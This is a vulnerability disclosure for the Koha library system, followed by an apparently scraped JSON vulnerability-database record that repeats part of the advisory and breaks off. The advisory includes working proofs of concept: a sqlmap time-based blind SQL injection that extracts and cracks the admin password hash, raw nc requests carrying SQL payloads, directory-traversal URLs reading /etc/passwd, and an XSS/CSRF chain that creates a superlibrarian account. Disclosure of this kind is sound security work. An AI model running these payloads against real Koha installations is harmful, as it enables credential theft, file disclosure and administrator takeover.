cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in further attacks.

===============================================================================================
SBA Research Vulnerability Disclosure
===============================================================================================

title:            Koha Unauthenticated SQL injection
product:          Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version:    3.20.1, 3.17.8, 3.16.12
CVE numbers:      CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact:           critical
website:          http://www.koha-community.org/

found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact:          cst@sba-research.org

References: http://koha-community.org/security-release-koha-3-20-1/         http://koha-community.org/security-release-koha-3-18-8/         http://koha-community.org/security-release-koha-3-16-12/

                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
                ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

========================= 1. Multiple SQL Injections =========================

  • ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
  • a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   +
  • ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +

Vulnerability:

The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well.

References:

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412

##################################################################################################

PoC:

##################################################################################################

  1. Inspect Koha database schema

Have a look at how to query the database for superlibrarian users:    http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

So basically we need to execute some SQL statement like this:    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

  1. Query the database with sqlmap

So let's fire up sqlmap with the --sql-shell parameter and input the query:

root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4          _     ___ | | ___ ___  {1.0-dev-nongit-20150513}    | -| . | |     | .'| . |    ||  |||||__,|  |          ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:20:07

[09:20:07] [INFO] testing connection to the target URL    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:    ---    Parameter: number (GET)        Type: AND/OR time-based blind        Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)        Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)    ---    [09:20:09] [INFO] testing MySQL    [09:20:09] [INFO] confirming MySQL    [09:20:09] [INFO] the back-end DBMS is MySQL    web server operating system: Linux Debian    web application technology: Apache 2.4.10    back-end DBMS: MySQL >= 5.0.0    [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;    [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'    [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind    [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                          [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors     admin    [09:21:46] [INFO] retrieved: $2a$08$taQ    [09:23:33] [ERROR] invalid character detected. retrying..    [09:23:33] [WARNING] increasing time delay to 5 seconds     afOgEEhU    [09:25:10] [ERROR] invalid character detected. retrying..    [09:25:10] [WARNING] increasing time delay to 6 seconds     t/gW    [09:26:13] [ERROR] invalid character detected. retrying..    [09:26:13] [WARNING] increasing time delay to 7 seconds     TOmqnYe1Y6ZNxCENa    [09:29:57] [ERROR] invalid character detected. retrying..    [09:29:57] [WARNING] increasing time delay to 8 seconds     2.ONk2eZhnuEw5z9OjjxS    [09:35:08] [ERROR] invalid character detected. retrying..    [09:35:08] [WARNING] increasing time delay to 9 seconds 

select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:        'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

  1. Feed john the ripper and be lucky

root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass    root@kali:/home/wicked# john ./admin-pass     Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])    admin            (?)    guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate    Use the "--show" option to display all of the cracked passwords reliably

root@kali:/home/wicked# john ./admin-pass --show    ?:admin

1 password hash cracked, 0 left

  1. If the webserver is misconfigured, read & write access to the filesystem may be possible.

References:

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

##################################################################################################

PoC:

##################################################################################################

==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002

==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

##################################################################################################

PoC End

##################################################################################################

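================================= 3. Directory traversal in the template_path parameter (CVE-2015-4632) =================================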

References

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408

##################################################################################################

PoC:

##################################################################################################

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

##################################################################################################

PoC End

##################################################################################################

================================= 4. The site also lacks challenge tokens that would prevent cross-site request forgery (XSRF) attacks.

The attack can be performed by:

  • through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
  • through a user clicking a malicious link (phishing mail, forum link etc.)

The following pages are affected by stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl /cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected by reflected XSS flaws:

/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display") /cgi-bin/koha/opac-search.pl (parameters: "tag") /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")  /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay") /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield") /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield") /cgi-bin/koha/catalogue/search.pl (parameters: "limit") /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")  /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")

Impact

The vulnerabilities allow remote attackers to inject arbitrary web script or HTML in order to:

  • escalate privileges by targeting staff members with XSRF 
  • target users via browser exploits
  • target the webserver by combining with other server-side vulnerabilities.  

References

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

##################################################################################################

PoC / Attack Scenario:

##################################################################################################

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http:///cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

--> http:///cgi-bin/koha/virtualshelves/shelves.pl

the malicious code gets executed. The code can then perform unauthorized actions with the permissions of user Bob. For example:

Create new user:

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibrarian permission:

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log in as superlibrarian.

Side Note: For the attack to work, Alice needs to be logged in to the Open Public Catalog interface when she clicks the malicious link. Alice also needs access to the OPAC interface and permission to create public lists.

##################################################################################################

PoC / Attack Scenario End

##################################################################################################



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0025",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "library software community koha",
        "scope": null,
        "trust": 3.0,
        "vendor": "koha",
        "version": null
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.18.08"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.20.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.20.01"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.16"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.12"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.18.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.20.x"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.16.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.16.12"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.14.16"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.14.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.08"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.16.07"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.16.09"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.16.11"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.18.1"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.16.08"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.16.10"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.20.00"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.16.06"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.18.0"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.20"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18.7"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16.11"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18.8"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16.12"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:koha:koha",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Raschin Ghanad-Tavakoli",
    "sources": [
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2015-4632",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2015-4632",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-05198",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05201",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05199",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05200",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-05197",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2015-4632",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-4632",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-4632",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05198",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05201",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05199",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05200",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05197",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201512-697",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-4632",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-4632"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008224"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-697"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4632"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. Koha Contains a path traversal vulnerability.Information may be obtained. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. Multiple directory-traversal vulnerabilities\n3. Multiple HTML Injection vulnerabilities\n4. Multiple cross-site scripting vulnerabilities\n5. Multiple cross site request forgery vulnerabilities\nAn attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. 
===============================================================================================\nSBA Research Vulnerability Disclosure\u00a0\n===============================================================================================\n\ntitle: \t\t\t        Koha Unauthenticated SQL injection\nproduct: \t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Koha ILS\naffected version:\t3.20.x \u003c= 3.20.1, 3.18.x \u003c= 3.18.8, 3.16.x \u003c= 3.16.12\nfixed version:\t\t3.20.1, 3.17.8, 3.16.12\nCVE numbers:\tCVE-2015-4633, CVE-2015-4632, CVE-2015-4631\nimpact:\t\t\tcritical\nwebsite:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://www.koha-community.org/\n\nfound by:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Raschin Tavakoli / SBA Research Combinatorial Security Testing Group\ncontact:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0cst@sba-research.org\n\n\nReferences:\t\thttp://koha-community.org/security-release-koha-3-20-1/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-18-8/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-16-12/\n\n\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u200bhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\n\n===========================================================================================
====\n\n=========================\n1. Mutiple SQL Injections\n=========================\n\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) \u00a0 +\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n\nVulnerability:\n--------------\nThe url parameter \u0027number\u0027 in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n1. Inspect Koha database schema\n\n\u00a0 \u00a0Have a look at how to query the database for superlibrarian users:\n\u00a0 \u00a0http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians\n\n\u00a0 \u00a0So basically we we need to execute some SQL statement like this:\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\n2. Query the database with sqlmap\n\n\u00a0 \u00a0So let\u0027s fire up sqlmap with the 